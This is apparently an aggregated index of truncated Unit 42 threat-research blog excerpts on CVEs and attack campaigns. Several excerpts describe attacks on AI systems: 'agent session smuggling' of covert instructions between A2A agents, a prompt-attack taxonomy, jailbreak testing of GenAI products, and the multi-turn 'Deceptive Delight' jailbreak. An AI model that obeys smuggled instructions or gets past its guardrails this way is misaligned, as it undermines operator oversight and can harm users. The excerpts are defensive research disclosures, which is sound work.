## When AI Agents Go Rogue: Agent Session Smuggling Attack in A2A Systems
Jay Chen
Royce Lu
Published: October 31, 2025
Threat Research
Vulnerabilities
GenAI
Google
LLM
## Executive Summary
We discovered a new attack technique, which we call agent session smuggling. This technique allows a malicious AI agent to exploit an established cross-agent communication session to send covert instructions to a victim agent.
Here, we discuss the issues that can arise in a communication session using the Agent2Agent (A2A) protocol, which is a popular option for managing the connections between agents. The A2A protocol’s stateful behavior lets agents remember recent interactions and maintain coherent conversations. This attack expl
Unit42
Threat Brief: Nation-State Actor Steals F5 Source Code and Undisclosed Vulnerabilities
blogs_unit42·2025-10-16·CVSS 8.5
CVE-2025-53868 [HIGH] Threat Brief: Nation-State Actor Steals F5 Source Code and Undisclosed Vulnerabilities
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Nation-State Actor Steals F5 Source Code and Undisclosed Vulnerabilities
Justin Moore
Published: October 16, 2025
High Profile Threats
Vulnerabilities
CVE-2025-53868
CVE-2025-57780
CVE-2025-61955
Exfiltration
## Executive Summary
On Oct. 15, 2025, F5 — a U.S. technology company — disclosed that a nation-state threat actor conducted a significant long-term compromise of their corporate networks. In this incident, attackers stole source code from their BIG-IP suite of products and information about undisclosed vulnerabilities. F5’s BIG-IP suite is commonly used by large organizations, primarily in the U.S. but also globally, for availability, access control and security. Organizations including gove
Unit42
TOTOLINK X6000R: Three New Vulnerabilities Uncovered
blogs_unit42·2025-10-01·CVSS 7.0
CVE-2025-52905 [HIGH] TOTOLINK X6000R: Three New Vulnerabilities Uncovered
Threat Research Center
Threat Research
Vulnerabilities
## TOTOLINK X6000R: Three New Vulnerabilities Uncovered
Zhibin Zhang
Published: October 1, 2025
Threat Research
Vulnerabilities
CVE-2025-52905
CVE-2025-52906
CVE-2025-52907
IoT Vulnerability
Remote Code Execution
## Executive Summary
We have uncovered three vulnerabilities in the firmware of the TOTOLINK X6000R router, version V9.4.0cu.1360_B20241207, released on March 28, 2025:
CVE
Rating
Score
Description
CVE-2025-52905
High
CVSS-B 7.0
An argument injection flaw that attackers can use to trigger a denial of service (DoS), crashing the router or overwhelming remote servers.
CVE-2025-52906
Critical
CVSS-B 9.3
An unauthenticated command injection vulnerability that allows attackers to remotely execute arbit
Unit42
Threat Brief: Salesloft Drift Integration Used To Compromise Salesforce Instances
blogs_unit42·2025-09-02
Threat Brief: Salesloft Drift Integration Used To Compromise Salesforce Instances
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Salesloft Drift Integration Used To Compromise Salesforce Instances
Unit 42
Published: September 2, 2025
High Profile Threats
Vulnerabilities
Credential-based attacks
Data exfiltration
Salesforce
Salesloft
## Executive Summary
Unit 42 stopped monitoring this threat and updating the brief on Dec. 2, 2025. Please refer to the Salesloft website for the latest information.
Unit 42 has observed activity consistent with a specific threat actor campaign leveraging the Salesloft Drift integration to compromise customer Salesforce instances. This brief provides information about our observations and guidance for potentially affected organizations.
As detailed in a recent notification from Salesloft , fro
Unit42
Your Connection, Their Cash: Threat Actors Misuse SDKs to Sell Your Bandwidth
blogs_unit42·2025-08-21·CVSS 9.8
CVE-2024-36401 [CRITICAL] Your Connection, Their Cash: Threat Actors Misuse SDKs to Sell Your Bandwidth
Threat Research Center
Threat Research
Vulnerabilities
## Your Connection, Their Cash: Threat Actors Misuse SDKs to Sell Your Bandwidth
Zhibin Zhang
Yiheng An
Chao Lei
Haozhe Zhang
Published: August 21, 2025
Threat Research
Vulnerabilities
CVE-2024-36401
## Executive Summary
We have detected a campaign aimed at gaining access to victims’ machines and monetizing access to their bandwidth. It functions by exploiting the CVE-2024-36401 vulnerability in the GeoServer geospatial database. This Critical-severity remote code execution vulnerability has a CVSS score of 9.8. Criminals have used the vulnerability to deploy legitimate software development kits (SDKs) or modified apps to gain passive income via network sharing or residential proxies.
This method of generating passive
Unit42
Keys to the Kingdom: Erlang/OTP SSH Vulnerability Analysis and Exploits Observed in the Wild
blogs_unit42·2025-08-11·CVSS 10.0
CVE-2025-32433 [CRITICAL] Keys to the Kingdom: Erlang/OTP SSH Vulnerability Analysis and Exploits Observed in the Wild
## Keys to the Kingdom: Erlang/OTP SSH Vulnerability Analysis and Exploits Observed in the Wild
Adam Robbie
Yiheng An
Malav Vyas
Cecilia Hu
Matthew Tennis
Hugo Perez
Zhanhao Chen
Rick Wyble
Published: August 11, 2025
Threat Research
Vulnerabilities
5G
CVE-2025-32433
Erlang
Operational Technology
Remote Code Execution
## Executive Summary
This article presents our observations of exploit attempts targeting CVE-2025-32433 . This vulnerability allows unauthenticated remote code execution (RCE) in the Secure Shell (SSH) daemon (sshd) from certain versions of the Erlang programming language's Open Telecom Platform (OTP).
Erlang/OTP sshd is widely used in critical infrastructure and operational technology (OT) networks.With a CVSS score of 10.0, CVE-2025-32433 enables unaut
Unit42
When Good Accounts Go Bad: Exploiting Delegated Managed Service Accounts in Active Directory
blogs_unit42·2025-08-06
When Good Accounts Go Bad: Exploiting Delegated Managed Service Accounts in Active Directory
## When Good Accounts Go Bad: Exploiting Delegated Managed Service Accounts in Active Directory
Noam Sala
Paul Michaud II
Ofir Shlomo
Published: August 6, 2025
Threat Research
Vulnerabilities
Active Directory
Microsoft
PowerShell
## Executive Summary
BadSuccessor is a critical attack vector that emerged following the release of Windows Server 2025. Under certain conditions, this server version enables users to leverage delegated Managed Service Accounts (dMSAs) to elevate privileges within Active Directory environments running Windows Server 2025. At the time of writing this article, no patch exists for this issue.
By analyzing the core mechanics of this technique and offering practical detection strategies, we help security professionals and system administrators understand
Unit42
Project AK47: Uncovering a Link to the SharePoint Vulnerability Attacks
blogs_unit42·2025-08-05·CVSS 8.8
CVE-2025-49704 [HIGH] Project AK47: Uncovering a Link to the SharePoint Vulnerability Attacks
## Project AK47: Uncovering a Link to the SharePoint Vulnerability Attacks
Hiroaki Hara
Mark Lim
Published: August 5, 2025
High Profile Threats
Threat Research
Vulnerabilities
Backdoor
CL-CRI-1040
CVE-2025-49704
CVE-2025-49706
CVE-2025-53770
CVE-2025-53771
LockBit
Microsoft
SharePoint
Storm-2603
## Executive Summary
Unit 42 observed notable overlaps between Microsoft’s reporting on ToolShell activity (an exploit chain affecting SharePoint vulnerabilities) and activity that we have been separately tracking. The activity, which we track as CL-CRI-1040, caught our attention by deploying a tool set that we call Project AK47, which includes a backdoor, ransomware and loaders.
Microsoft's report named a suspected China-based threat actor, Storm-2603. Based on our analysis o
Unit42
Active Exploitation of Microsoft SharePoint Vulnerabilities: Threat Brief (Updated August 12)
blogs_unit42·2025-07-31·CVSS 8.8
CVE-2025-49704 [HIGH] Active Exploitation of Microsoft SharePoint Vulnerabilities: Threat Brief (Updated August 12)
Threat Research Center
High Profile Threats
Vulnerabilities
## Active Exploitation of Microsoft SharePoint Vulnerabilities: Threat Brief (Updated August 12)
Unit 42
Published: July 31, 2025
High Profile Threats
Vulnerabilities
CL-CRI-1040
CVE-2025-49704
CVE-2025-49706
CVE-2025-53770
CVE-2025-53771
Microsoft
SharePoint
Zero-day
## Executive Summary
Unit 42 stopped monitoring this threat and updating the brief on Sept. 18, 2025. Please refer to the Microsoft SharePoint customer guidance for the latest information.
Update July 31, 2025
An investigation into ToolShell exploitation revealed the deployment of 4L4MD4R ransomware, a variant of the open-source Mauri870 ransomware.
A failed exploitation attempt on July 27, 2025, involving an encoded PowerShell command, led
Unit42
The Covert Operator's Playbook: Infiltration of Global Telecom Networks
blogs_unit42·2025-07-29
The Covert Operator's Playbook: Infiltration of Global Telecom Networks
## The Covert Operator's Playbook: Infiltration of Global Telecom Networks
Renzon Cruz
Nicolas Bareil
Navin Thomas
Published: July 29, 2025
Malware
Threat Actor Groups
Threat Research
Vulnerabilities
Advanced Persistent Threat
Backdoor
CL-STA-0969
GALLIUM
GoLang
Liminal Panda
PingPull
Telecoms
UNC1945
UNC2891
UNC3886
## Executive Summary
Unit 42 has observed multiple incidents targeting the telecommunications industry in Southwest Asia. We are currently tracking this activity as CL-STA-0969 . This activity includes attacking and leveraging interconnected mobile roaming networks. This report provides a technical analysis of the activity cluster based on our incident response engagements including observed tactics, techniques and procedures (TTPs).
We found no clear
Unit42
Apache Under the Lens: Tomcat’s Partial PUT and Camel’s Header Hijack
blogs_unit42·2025-07-03·CVSS 9.8
CVE-2025-24813 [CRITICAL] Apache Under the Lens: Tomcat’s Partial PUT and Camel’s Header Hijack
Threat Research Center
Threat Research
Vulnerabilities
## Apache Under the Lens: Tomcat’s Partial PUT and Camel’s Header Hijack
Jun Li
Qiang Liu
Yiheng An
Haozhe Zhang
Published: July 3, 2025
Threat Research
Vulnerabilities
Apache
CVE-2025-24813
CVE-2025-27636
CVE-2025-29891
Remote Code Execution
## Executive Summary
In March 2025, Apache disclosed CVE-2025-24813 , a vulnerability impacting Apache Tomcat. This is a widely used platform that allows Apache web servers to run Java-based web applications. The flaw allows remote code execution, affecting Apache Tomcat versions 9.0.0.M1 to 9.0.98, 10.1.0-M1 to 10.1.34 and 11.0.0-M1 to 11.0.2.
The same month, Apache revealed two additional vulnerabilities in Apache Camel, a message routing middleware framework. These vulnera
Unit42
Threat Brief: CVE-2025-31324 (Updated June 25)
blogs_unit42·2025-05-23·CVSS 10.0
CVE-2025-31324 [CRITICAL] Threat Brief: CVE-2025-31324 (Updated June 25)
## Threat Brief: CVE-2025-31324 (Updated June 25)
Unit 42
Published: May 23, 2025
High Profile Threats
Vulnerabilities
CVE-2025-31324
Remote Code Execution
Web shells
## Executive Summary
Unit 42 stopped monitoring this threat and updating the brief on Monday, June 25, 2025. Please refer to the SAP Netweaver release notes for the latest information.
Update May 23, 2025: We have added further details and indicators of compromise (IoC) to this post, to provide defenders additional information to hunt with. This information can be found in the Appendix section .
On April 24, 2025, SAP disclosed CVE-2025-31324 , a critical vulnerability with a CVSS score of 10.0 affecting the SAP NetWeaver's Visual Composer Framework, version 7.50. This threat brief shares a brief overview of the
Unit42
How Prompt Attacks Exploit GenAI and How to Fight Back
blogs_unit42·2025-04-09
How Prompt Attacks Exploit GenAI and How to Fight Back
## How Prompt Attacks Exploit GenAI and How to Fight Back
Xu Zou
Published: April 9, 2025
Threat Research
Trend Reports
Vulnerabilities
GenAI
Jailbroken
LLM
Prompt injection
## Executive Summary
Palo Alto Networks has released “ Securing GenAI: A Comprehensive Report on Prompt Attacks: Taxonomy, Risks, and Solutions ,” which surveys emerging prompt-based attacks on AI applications and AI agents. While generative AI (GenAI) has many valid applications for enterprise productivity, there is also potential for critical security vulnerabilities in AI applications and AI agents.
The whitepaper comprehensively categorizes attacks that can manipulate AI systems into performing unintended or harmful actions — such as guardrail bypass , information leakage and goal hijacking . In the
Unit42
Multiple Vulnerabilities Discovered in a SCADA System
blogs_unit42·2025-03-07·CVSS 7.0
CVE-2024-1182 [HIGH] Multiple Vulnerabilities Discovered in a SCADA System
## Multiple Vulnerabilities Discovered in a SCADA System
Asher Davila
Malav Vyas
Published: March 7, 2025
Threat Research
Vulnerabilities
CVE-2024-1182
CVE-2024-7587
CVE-2024-8299
CVE-2024-8300
CVE-2024-9852
DLL
ICS
IIoT
IoT Attacks
IoT Security
Operational Technology
Privilege escalation
SCADA
## Executive Summary
In early 2024 we conducted a security assessment of a Supervisory Control and Data Acquisition (SCADA) system named ICONICS Suite and identified five vulnerabilities in versions 10.97.2 and earlier for Microsoft Windows. We coordinated with the ICONICS security team, which released multiple security patches in 2024 to resolve some of these issues and published timely security advisories with workarounds for the rest.
Table 1 shows the five vulnerabilities
Unit42
Investigating LLM Jailbreaking of Popular Generative AI Web Products
blogs_unit42·2025-02-21
Investigating LLM Jailbreaking of Popular Generative AI Web Products
## Investigating LLM Jailbreaking of Popular Generative AI Web Products
Yongzhe Huang
Yang Ji
Wenjun Hu
Published: February 21, 2025
Threat Research
Vulnerabilities
GenAI
Jailbroken
LangChain
Prompt injection
## Executive Summary
This article summarizes our investigation into jailbreaking 17 of the most popular generative AI (GenAI) web products that offer text generation or chatbot services.
Large language models (LLMs) typically include guardrails to prevent users from generating content considered unsafe (such as language that is biased or violent). Guardrails also prevent users from persuading the LLM to communicate sensitive data, such as the training data used to create the model or its system prompt. Jailbreaking techniques are used to bypass those guardrails.
The g
Unit42
Multiple Vulnerabilities Discovered in NVIDIA CUDA Toolkit
blogs_unit42·2025-02-19·CVSS 3.3
CVE-2024-53870 [LOW] Multiple Vulnerabilities Discovered in NVIDIA CUDA Toolkit
## Multiple Vulnerabilities Discovered in NVIDIA CUDA Toolkit
Kai Lu
Published: February 19, 2025
Threat Research
Vulnerabilities
CUDA
Cuobjdump
CVE-2024-53870
CVE-2024-53871
CVE-2024-53872
CVE-2024-53873
CVE-2024-53874
CVE-2024-53875
CVE-2024-53876
CVE-2024-53877
CVE-2024-53878
Nvdisasm
NVIDIA
## Executive Summary
This article reviews nine vulnerabilities we recently discovered in two utilities called cuobjdump and nvdisasm , both from NVIDIA's Compute Unified Device Architecture (CUDA) Toolkit. We have coordinated with NVIDIA, and the company has released an update in February 2025 to address these issues.
The vulnerabilities are tracked as the following Common Vulnerabilities and Exposures (CVEs):
CVE-2024-53870
CVE-2024-53871
CVE-2024-53872
CVE-2024-53873
CV
Unit42
Threat Brief: CVE-2025-0282 and CVE-2025-0283 (Updated March 11)
blogs_unit42·2025-01-17·CVSS 9.0
CVE-2025-0282 [CRITICAL] Threat Brief: CVE-2025-0282 and CVE-2025-0283 (Updated March 11)
## Threat Brief: CVE-2025-0282 and CVE-2025-0283 (Updated March 11)
Unit 42
Published: January 16, 2025
High Profile Threats
Vulnerabilities
CL-UNK-0979
CVE-2025-0282
CVE-2025-0283
Ivanti
SPAWNMOLE
SPAWNSLOTH
SPAWNSNAIL
UNC5337
## Executive Summary
Unit 42 stopped monitoring this threat as well as updating this brief on March 11, 2025. Please refer to Ivanti's Security Advisory for the latest information.
On Jan. 8, 2025, Ivanti released a security advisory for two vulnerabilities ( CVE-2025-0282 and CVE-2025-0283 ) in its Connect Secure, Policy Secure and ZTA gateway products. This threat brief provides attack details that we observed in a recent incident response engagement to provide actionable intelligence to the community. These details can be used to further detect
Unit42
Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 (Updated Nov. 22)
blogs_unit42·2024-11-22·CVSS 9.3
CVE-2024-0012 [CRITICAL] Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 (Updated Nov. 22)
## Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 (Updated Nov. 22)
Unit 42
Published: November 22, 2024
High Profile Threats
Vulnerabilities
CVE-2024-0012
CVE-2024-9474
Operation Lunar Peek
PAN-OS
## Executive Summary
Palo Alto Networks and Unit 42 continue to track exploitation activity related to CVE-2024-0012 and CVE-2024-9474. We are working with external researchers, partners and customers to share information transparently and rapidly.
Fixes for both vulnerabilities are available . Please refer to the Palo Alto Networks Security Advisories ( CVE-2024-0012 , CVE-2024-9474 ) for additional details about recommended solutions and affected products.
An authentication bypass in Palo Alto Networks PAN-OS software ( CVE-2024-0012 ) en
Unit42
Deceptive Delight: Jailbreak LLMs Through Camouflage and Distraction
blogs_unit42·2024-10-23
Deceptive Delight: Jailbreak LLMs Through Camouflage and Distraction
## Deceptive Delight: Jailbreak LLMs Through Camouflage and Distraction
Jay Chen
Royce Lu
Published: October 23, 2024
Threat Research
Vulnerabilities
GenAI
Jailbroken
LLM
Prompt injection
## Executive Summary
This article introduces a simple and straightforward technique for jailbreaking that we call Deceptive Delight. Deceptive Delight is a multi-turn technique that engages large language models (LLM) in an interactive conversation, gradually bypassing their safety guardrails and eliciting them to generate unsafe or harmful content.
We tested this simple yet effective method in 8,000 cases across eight models. We found that it achieves an average attack success rate of 65% within just three interaction turns with the target model.
Deceptive Delight operates by embedding un
Unit42
Gatekeeper Bypass: Uncovering Weaknesses in a macOS Security Mechanism
blogs_unit42·2024-10-17
Gatekeeper Bypass: Uncovering Weaknesses in a macOS Security Mechanism
## Gatekeeper Bypass: Uncovering Weaknesses in a macOS Security Mechanism
Adva Gabay
Maor Dokhanian
Published: October 17, 2024
Threat Research
Vulnerabilities
Apple Gatekeeper
MacOS
Third-party applications
## Executive Summary
Unit 42 researchers have found that certain third-party utilities and applications pertaining to archiving, virtualization and Apple’s native command-line tools do not enforce the quarantine attribute. This can pose a threat to the integrity of a security feature on macOS known as Gatekeeper, which is responsible for ensuring that only trusted software runs on the system. A bypass of Gatekeeper could leave the user unprotected from risky applications that may attempt to execute malicious content.
One of the key components of the Gatekeeper security fe
Unit42
Harnessing LLMs for Automating BOLA Detection
blogs_unit42·2024-08-12·CVSS 7.7
[HIGH] Harnessing LLMs for Automating BOLA Detection
## Harnessing LLMs for Automating BOLA Detection
Ravid Mazon
Jay Chen
Published: August 12, 2024
Threat Research
Vulnerabilities
API
BOLA
GenAI
LLM
Web application firewall
## Executive Summary
This post presents our research on a methodology we call BOLABuster, which uses large language models (LLMs) to detect broken object level authorization (BOLA) vulnerabilities. By automating BOLA detection at scale, we will show promising results in identifying these vulnerabilities in open-source projects.
BOLA is a widespread and potentially critical vulnerability in modern APIs and web applications. While manually exploiting BOLA vulnerabilities is usually straightforward, automatically identifying new BOLAs is challenging for the following reasons:
The complexities of applicatio
Unit42
Identifying a BOLA Vulnerability in Harbor, a Cloud-Native Container Registry
blogs_unit42·2024-07-31·CVSS 6.4
[MEDIUM] Identifying a BOLA Vulnerability in Harbor, a Cloud-Native Container Registry
Threat Research Center
Threat Research
Vulnerabilities
## Identifying a BOLA Vulnerability in Harbor, a Cloud-Native Container Registry
Jay Chen
Ravid Mazon
Published: July 31, 2024
Threat Research
Vulnerabilities
API attacks
BOLA
Harbor
## Executive Summary
In a recent audit of open-source web applications, threat researchers from Unit 42 have identified a broken object-level authorization (BOLA) vulnerability that impacts Harbor versions prior to 2.9.5. Harbor is a widely used cloud-native container registry that plays a role in cloud environments by hosting container images and providing features such as role-based access control (RBAC), vulnerability scanning and image signing. It is an open-source CNCF Graduated project with over 22,600 stars and 1.8 million downloads
Unit42
AI Tool Identifies BOLA Vulnerabilities in Easy!Appointments
blogs_unit42·2024-07-25·CVSS 7.7
CVE-2023-3285 [HIGH] AI Tool Identifies BOLA Vulnerabilities in Easy!Appointments
Threat Research Center
Threat Research
Vulnerabilities
## AI Tool Identifies BOLA Vulnerabilities in Easy!Appointments
Ravid Mazon
Jay Chen
Published: July 25, 2024
Threat Research
Vulnerabilities
API attacks
BOLA
CVE-2023-3285
CVE-2023-3290
CVE-2023-38047
CVE-2023-38055
Easy!Appointments
## Executive Summary
Palo Alto Networks has been actively researching and developing security capabilities using AI . In an effort to audit web applications for Broken Object-Level Authorization (BOLA) vulnerabilities, Unit 42 researchers developed an automated BOLA detection tool leveraging GenAI.
In 2023, we used our tool to test an open-source project, Easy!Appointments , and found 15 BOLA vulnerabilities. We notified the vendor, who has since patched the vulnerabilities. The numb
Unit42
Vulnerabilities in LangChain Gen AI
blogs_unit42·2024-07-23·CVSS 9.8
CVE-2023-44467 [CRITICAL] Vulnerabilities in LangChain Gen AI
Threat Research Center
Threat Research
Vulnerabilities
## Vulnerabilities in LangChain Gen AI
Yiheng An
Haozhe Zhang
Qi Deng
Published: July 23, 2024
Threat Research
Vulnerabilities
CVE-2023-44467
CVE-2023-46229
GenAI
LangChain
LLM
## Executive Summary
Researchers from Palo Alto Networks have identified two vulnerabilities in LangChain, a popular open source generative AI framework with over 81,000 stars on GitHub:
CVE-2023-46229
CVE-2023-44467 (LangChain experimental)
LangChain’s website states that more than one million builders use LangChain frameworks for LLM app development. Partner packages for LangChain include many of the big names in cloud, AI, databases and other tech development.
These two flaws could have allowed attackers to execute arbitrary code and a
Unit42
Threat Brief: CVE-2024-6387 OpenSSH RegreSSHion Vulnerability
blogs_unit42·2024-07-02·CVSS 8.1
CVE-2024-6387 [HIGH] Threat Brief: CVE-2024-6387 OpenSSH RegreSSHion Vulnerability
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: CVE-2024-6387 OpenSSH RegreSSHion Vulnerability
Unit 42
Published: July 2, 2024
Cloud Cybersecurity Research
High Profile Threats
Vulnerabilities
CVE-2024-6387
OpenSSH
RegreSSHion
Remote Code Execution
SSH
## Executive Summary
On July 1, 2024, a critical signal handler race condition vulnerability was disclosed in OpenSSH servers ( sshd ) on glibc-based Linux systems. This vulnerability, called RegreSSHion and tracked as CVE-2024-6387 , can result in unauthenticated remote code execution (RCE) with root privileges. This vulnerability has been rated High severity ( CVSS 8.1 ).
This vulnerability impacts the following OpenSSH server versions:
Open SSH version between 8.5p1-9.8p1
Open SSH versio
Unit42
Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 (Updated May 20)
blogs_unit42·2024-04-12·CVSS 10.0
CVE-2024-3400 [CRITICAL] Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 (Updated May 20)
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 (Updated May 20)
Unit 42
Published: April 12, 2024
High Profile Threats
Malware
Vulnerabilities
Backdoor
Command injection
CVE-2024-3400
MidnightEclipse
Python
Upstyle
## Executive Summary
This threat brief is monitored daily and updated as new intelligence is available for us to share. The full update log is at the end of this post and offers the fullest account of all changes made.
Palo Alto Networks and Unit 42 are engaged in tracking activity related to CVE-2024-3400 and are working with external researchers, partners and customers to share information transparently and rapidly.
A critical command injection vul
Unit42
Threat Brief: Vulnerability in XZ Utils Data Compression Library Impacting Multiple Linux Distributions (CVE-2024-3094)
blogs_unit42·2024-03-31·CVSS 10.0
CVE-2024-3094 [CRITICAL] Threat Brief: Vulnerability in XZ Utils Data Compression Library Impacting Multiple Linux Distributions (CVE-2024-3094)
Threat Research Center
High Profile Threats
Cloud Cybersecurity Research
## Threat Brief: Vulnerability in XZ Utils Data Compression Library Impacting Multiple Linux Distributions (CVE-2024-3094)
Unit 42
Published: March 30, 2024
Cloud Cybersecurity Research
High Profile Threats
Vulnerabilities
CVE-2024-3094
Linux
XZ Utils
## Executive Summary
On March 28, 2024, Red Hat Linux announced CVE-2024-3094 with a critical CVSS score of 10. This vulnerability is a result of a supply chain compromise impacting the versions 5.6.0 and 5.6.1 of XZ Utils. XZ Utils is data compression software included in major Linux distributions. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has advised people to downgrade to an uncompromised XZ Utils version (earlier than 5.6.0).
Unit42
Exposing a New BOLA Vulnerability in Grafana
blogs_unit42·2024-03-27·CVSS 6.5
CVE-2024-1313 [MEDIUM] Exposing a New BOLA Vulnerability in Grafana
Threat Research Center
Threat Research
Vulnerabilities
## Exposing a New BOLA Vulnerability in Grafana
Ravid Mazon
Jay Chen
Published: March 27, 2024
Threat Research
Vulnerabilities
API
API attacks
BOLA
CVE-2024-1313
## Executive Summary
Unit 42 researchers have discovered a new Broken Object Level Authorization (BOLA) vulnerability that impacts Grafana versions from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5 . Grafana is a popular open-source data observability and visualization platform with over 20 million users worldwide and almost 60,000 stars on GitHub.
This vulnerability, assigned as CVE-2024-1313 with a CVSS score of 6.5 , allows low-privileged Grafana users to delete dashboard
Unit42
Threat Brief: ConnectWise ScreenConnect Vulnerabilities (CVE-2024-1708 and CVE-2024-1709)
blogs_unit42·2024-02-22·CVSS 8.4
CVE-2024-1708 [HIGH] Threat Brief: ConnectWise ScreenConnect Vulnerabilities (CVE-2024-1708 and CVE-2024-1709)
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: ConnectWise ScreenConnect Vulnerabilities (CVE-2024-1708 and CVE-2024-1709)
Unit 42
Published: February 21, 2024
High Profile Threats
Vulnerabilities
ConnectWise
CVE-2024-1708
CVE-2024-1709
Remote desktop
Vulnerability exploit
## Executive Summary
Feb. 13, 2024, ConnectWise was notified of two vulnerabilities impacting their remote desktop software application ScreenConnect. These vulnerabilities were first reported through their vulnerability disclosure channel in the ConnectWise Trust Center.
Feb. 19, 2024, ConnectWise publicly disclosed the vulnerabilities in a security bulletin .
As of Feb. 21, 2024, Unit 42 observed 18,188 unique IP addresses hosting ScreenConnect globally.
The newly disc
Unit42
New Vulnerability in QNAP QTS Firmware: CVE-2023-50358
blogs_unit42·2024-02-13·CVSS 5.8
CVE-2023-50358 [MEDIUM] New Vulnerability in QNAP QTS Firmware: CVE-2023-50358
Threat Research Center
Threat Research
Vulnerabilities
## New Vulnerability in QNAP QTS Firmware: CVE-2023-50358
Chao Lei
Jeff Luo
Zhibin Zhang
Published: February 13, 2024
Threat Research
Vulnerabilities
CVE-2023-50358
IoT
IoT Vulnerability
QNAP Network Attached Storage
## Executive Summary
This article provides technical analysis on a zero-day vulnerability affecting QNAP Network Attached Storage (NAS) devices. Our Advanced Threat Prevention (ATP) and telemetry systems provided indicators of a previously unknown vulnerability in QNAP QTS and QuTS hero firmware. We provided our findings to the vendor, and QNAP has assigned the tracking ID CVE-2023-50358 to this new vulnerability. We also offer recommendations on how to defend against this newly-revealed threat.
QNAP is
Unit42
Exploring the Latest Mispadu Stealer Variant
blogs_unit42·2024-02-02·CVSS 8.8
CVE-2023-36025 [HIGH] Exploring the Latest Mispadu Stealer Variant
Threat Research Center
Threat Research
Malware
## Exploring the Latest Mispadu Stealer Variant
Daniela Shalev
Josh Grunzweig
Published: February 2, 2024
Learning Hub
Malware
Threat Research
Vulnerabilities
Banking Trojan
CVE-2023-36025
Mispadu infostealer
## Executive Summary
Unit 42 researchers recently discovered activity attributed to Mispadu Stealer, a stealthy infostealer first reported in 2019. We found this activity as part of the Unit 42 Managed Threat Hunting offering. We discovered this threat activity while hunting for the SmartScreen CVE-2023-36025 vulnerability.
When we hunted for exploitation of the CVE-2023-36025 vulnerability in this case, we discovered an infostealer family that targets specific regions and URLs that are most commonly associated with ci
Unit42
Threat Brief: Multiple Ivanti Vulnerabilities (Updated Feb. 29)
blogs_unit42·2024-01-16·CVSS 8.2
CVE-2023-46805 [HIGH] Threat Brief: Multiple Ivanti Vulnerabilities (Updated Feb. 29)
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Multiple Ivanti Vulnerabilities (Updated Feb. 29)
Unit 42
Published: January 16, 2024
High Profile Threats
Vulnerabilities
CVE-2023-46805
CVE-2024-21887
CVE-2024-21888
CVE-2024-21893
CVE-2024-22024
Ivanti
VPNs
Unit 42 stopped monitoring this threat and updating the brief on Feb. 29, 2024. Please refer to Ivanti's website for the latest information.
## Update Feb. 29
The U.S. government, in collaboration with international government allies, has published a Joint Cybersecurity Advisory (CSA) which includes recent findings about exploitation of the Ivanti vulnerabilities. In this report the authoring organizations state that threat actors are able to deceive Ivanti’s internal and external Integr
Unit42
Fighting Ursa Aka APT28: Illuminating a Covert Campaign
blogs_unit42·2023-12-07·CVSS 9.8
CVE-2023-23397 [CRITICAL] Fighting Ursa Aka APT28: Illuminating a Covert Campaign
Threat Research Center
Threat Actor Groups
Vulnerabilities
## Fighting Ursa Aka APT28: Illuminating a Covert Campaign
Unit 42
Published: December 7, 2023
Nation-State Cyberattacks
Threat Actor Groups
Vulnerabilities
Advanced Persistent Threat
APT28
Cortex XDR
CVE-2023-23397
Fancy Bear
Fighting Ursa
Microsoft Outlook
Microsoft Vulnerability
Privilege escalation
Russia
UAC-0001
Ukraine
## Executive Summary
Early this year, Ukrainian cybersecurity researchers found Fighting Ursa leveraging a zero-day exploit in Microsoft Outlook (now known as CVE-2023-23397). This vulnerability is especially concerning since it doesn’t require user interaction to exploit. Unit 42 researchers have observed this group using CVE-2023-23397 over the past 20 months to target at least 30 o
Unit42
In-Depth Analysis of July 2023 Exploit Chain Featuring CVE-2023-36884 and CVE-2023-36584
blogs_unit42·2023-11-13·CVSS 5.4
CVE-2023-36884 [MEDIUM] In-Depth Analysis of July 2023 Exploit Chain Featuring CVE-2023-36884 and CVE-2023-36584
Threat Research Center
Threat Research
Vulnerabilities
## In-Depth Analysis of July 2023 Exploit Chain Featuring CVE-2023-36884 and CVE-2023-36584
Eli Birkan
Dan Yashnik
Oriel Cochavi
Bar Lahav
Mike Harbison
Published: November 13, 2023
Malware
Threat Research
Vulnerabilities
CVE-2023-36584
CVE-2023-36884
Exploit
Microsoft Office
Microsoft Vulnerability
Remote Code Execution
RomCom
Storm-0978
Ukraine
## Executive Summary
During our analysis of a July 2023 campaign targeting groups supporting Ukraine's admission into NATO, we discovered a new vulnerability for bypassing Microsoft's Mark-of-the-Web (MotW) security feature. This activity has been attributed by the community to the pro-Russian APT group known as Storm-0978 (also known as the RomCom Group, in referenc
Unit42
High Traffic + High Vulnerability = an Attractive Target for Criminals: The Dangers of Viewing Clickbait Sites
blogs_unit42·2023-11-09·CVSS 6.1
CVE-2023-3169 [MEDIUM] High Traffic + High Vulnerability = an Attractive Target for Criminals: The Dangers of Viewing Clickbait Sites
Threat Research Center
Threat Research
Cybercrime
## High Traffic + High Vulnerability = an Attractive Target for Criminals: The Dangers of Viewing Clickbait Sites
Shresta Bellary Seetharam
Tao Yan
Nabeel Mohamed
Tim Hofmockel
Alex Starov
Brad Duncan
Published: November 9, 2023
Cybercrime
Threat Research
Vulnerabilities
CVE-2023-3169
Web threats
## Executive Summary
Since the end of August 2023, we have observed a significant rise in compromised servers specializing in clickbait and ad content. But why are sites like this such an attractive target for criminals? Mainly because these sites are designed to reach a large number of potential victims. Furthermore, clickbait sites often use outdated or unpatched software, making them vulnerable to compromise.
This article e
Unit42
Threat Brief: Citrix Bleed CVE-2023-4966
blogs_unit42·2023-11-01·CVSS 9.4
CVE-2023-4966 [CRITICAL] Threat Brief: Citrix Bleed CVE-2023-4966
